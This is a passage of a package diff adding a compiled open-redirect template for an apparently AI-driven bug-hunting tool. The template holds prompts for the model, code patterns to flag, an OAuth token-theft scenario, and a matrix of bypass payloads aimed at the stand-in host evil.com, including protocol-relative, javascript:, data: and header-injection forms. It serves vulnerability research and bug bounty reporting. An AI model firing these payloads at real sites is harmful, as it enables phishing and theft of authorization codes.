+- Unicode chars: /℃evil.com — some normalizers resolve to /cevil.com, confusing parsers
+- Newline injection: /redirect?url=https://good.com%0d%0aSet-Cookie:session=evil (header injection)
+- Subdomain trick: https://trusted.com.evil.com/ passes contains('trusted.com') check
+
+COMMON CODE PATTERNS TO FLAG:
+- res.redirect(req.query.redirect) with no validation
+- window.location = searchParams.get('next') in frontend code
+- Header injection: Location: \${userValue} in raw HTTP response building
+- allowedDomains.some(d => url.includes(d)) — contains check, not host equality
+
+RELEVANT SPECIFICATIONS:
+- CWE-601 (URL Redirection to Untrusted Site)
+- RFC 7231 Section 7.1.2: Location header format`,
+    deepDivePrompt: `You are an expert security researcher writing a bug bounty report for an open redirect vulnerability.
+
+Given the hypothesis below, verify whether the vulnerability is real and exploitable.
+
+Build a complete attack scenario:
+1. What parameter or input controls the redirect destination?
+2. What validation (if any) is applied, and how is it bypassed?
+3. What is the attack? (Phishing, OAuth token theft, credential harvesting)
+4. Provide a concrete URL that triggers the redirect to an attacker-controlled site.
+5. Explain why this is high/medium severity in this specific application context.
+
+ATTACK SCENARIOS BY SEVERITY:
+- OAuth redirect_uri open redirect → token theft: attacker crafts authorization URL with /callback?code=...&next=//evil.com, authorization code leaked in Referer header to evil.com → CRITICAL
+- Post-login redirect → phishing: /login?next=//evil.com redirects user to fake login page after auth → HIGH
+- Standalone redirect → phishing: /redirect?url=//evil.com — lower trust, still exploitable → MEDIUM
+
+BYPASS PAYLOAD MATRIX:
+\`\`\`
+//evil.com                    (protocol-relative)
+/\\evil.com                    (backslash normalization)
+https://trusted.com@evil.com  (credentials in URL, host is evil.com)
+https://trusted.com.evil.com  (subdomain of attacker)
+javascript:alert(1)           (javascript: URI)
+data:text/html,<meta http-equiv=refresh content=0;url=https://evil.com>
+%2f%2fevil.com                (encoded //)
+/%09/evil.com                 (tab character between slashes)
+\`\`\`
+
+OAUTH TOKEN THEFT SCENARIO:
+1. Application has /auth/callback?code=...&next=<redirect>
+2. Authorization server redirects to this callback with the code
+3. Code is processed, then response redirects to 'next' parameter
+4. Attacker sets next=https://evil.com — Referer header leaks code/token to evil.com
+
+EVIDENCE TO INCLUDE:
+- The full URL with bypass payload
+- The HTTP 3xx response with the Location header showing evil.com
+- Whether the victim's authenticated session cookies are also sent (most damaging case)
+
+RELEVANT SPECIFICATIONS:
+- CWE-601: URL Redirection to Untrusted Site
+- RFC 7231 Section 7.1.2: Location header must be an absolute-form or relative reference`,
+    knownBypasses: [
+        'Protocol-relative URL: //evil.com/ bypasses https:// prefix check',
+        'Backslash normalization: /\\evil.com treated as //evil.com by browsers',
+        'URL credentials: https://trusted.com@evil.com (host is evil.com)',
+        'Subdomain trick: trusted.com.evil.com passes contains() check',
+        'javascript: URI for same-origin XSS',
+        'Double encoding: %252f%252fevil.com → %2f%2f → //evil.com',
+        'Newline injection in Location header (header splitting)',
+        'data: URI with meta-refresh',
+    ],
+    specReferences: [
+        'CWE-601 (URL Redirection to Untrusted Site)',
+        'RFC 7231 Section 7.1.2 (Location header)',
+    ],
+    severityRange: ['low', 'medium'],
+};
+//# sourceMappingURL=open-redirect.js.map

package/dist/hunt/templates/open-redirect.js.map

@@ -0,0 +1 @@
+{"version":3,"file":"open-redirect.js","sourceRoot":"","sources":["../../../src/hunt/templates/open-redirect.ts"],"names":[],"mappings":"AAEA,MAAM,CAAC,MAAM,YAAY,GAA0B;IACjD,EAAE,EAAE,eAAe;IACnB,IAAI,EAAE,eAAe;IACrB,GAAG,EAAE,SAAS;IACd,YAAY,EAAE,CAAC,UAAU,EAAE,UAAU,EAAE,KAAK,EAAE,QAAQ,EAAE,MAAM,EAAE,UAAU,EAAE,UAAU,EAAE,MAAM,CAAC;IAC/F,YAAY,EAAE;;;;;;;;;;;;;;;;;;;;;;;;;;;;iDA4BiC;IAE/C,cAAc,EAAE;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;yFAyCuE;IAEvF,aAAa,EAAE;QACb,mEAAmE;QACnE,wEAAwE;QACxE,kEAAkE;QAClE,+DAA+D;QAC/D,qCAAqC;QACrC,2DAA2D;QAC3D,yDAAyD;QACzD,6BAA6B;KAC9B;IACD,cAAc,EAAE;QACd,6CAA6C;QAC7C,0CAA0C;KAC3C;IACD,aAAa,EAAE,CAAC,KAAK,EAAE,QAAQ,CAAC;CACjC,CAAC"}

package/dist/hunt/templates/path-traversal.d.ts

@@ -0,0 +1,2 @@
+import type { VulnerabilityTemplate } from '../../types.js';
+export declare const pathTraversal: VulnerabilityTemplate;